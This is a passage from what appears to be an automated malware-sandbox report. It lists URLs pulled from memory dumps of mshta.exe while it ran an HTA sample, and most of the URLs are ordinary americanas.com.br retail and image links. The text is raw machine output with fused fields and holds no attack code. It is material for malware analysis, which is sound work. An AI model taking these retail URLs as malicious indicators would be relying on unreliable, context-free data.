                                                                                                                                  https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imagmshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                    high
                                                                                                                                    https://www.americanas.com.br/busca/presepio-de-natalomshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-mobile-thememshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403707173.000000000AC2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-Smshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464408600.0000000009511000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.pngwmshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-footmshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398256426.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479387385.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484690315.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpg-mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://www.americanas.com.br/categoria/enfeites-de-natal?chave=pfm_home_natal_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B706000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_mob-0600bcc12452.pngc;mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresasmshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.png1mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menumshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478014141.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.americanas.com.br/#primaryimagemshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pngEmshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484604910.00000000094BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.americanas.com.br/categoria/eletroportateis?chave=dk_hm_at_eletroportateismshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://nossaslojas.americanas.com.br/?chave=dk_ft_lojasmshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25479000950.000000000AC66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378109211.000000000ABA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377309102.000000000AB99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488441042.000000000AC66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://securepubads.g.doubleclick.net/tag/js/gpt.jsrqmshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-homemshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483197472.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386380678.000000000307C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479810428.000000000307D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555amshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411576650.000000000951C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484103441.0000000009463000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398726849.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.0000000009517000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460101803.000000000AC8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463535902.000000000AC8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.americanas.com.br/lojista/americanas-33014556000196/c/brinquedos?origem=blancalojista&chmshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401588246.000000000ABC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 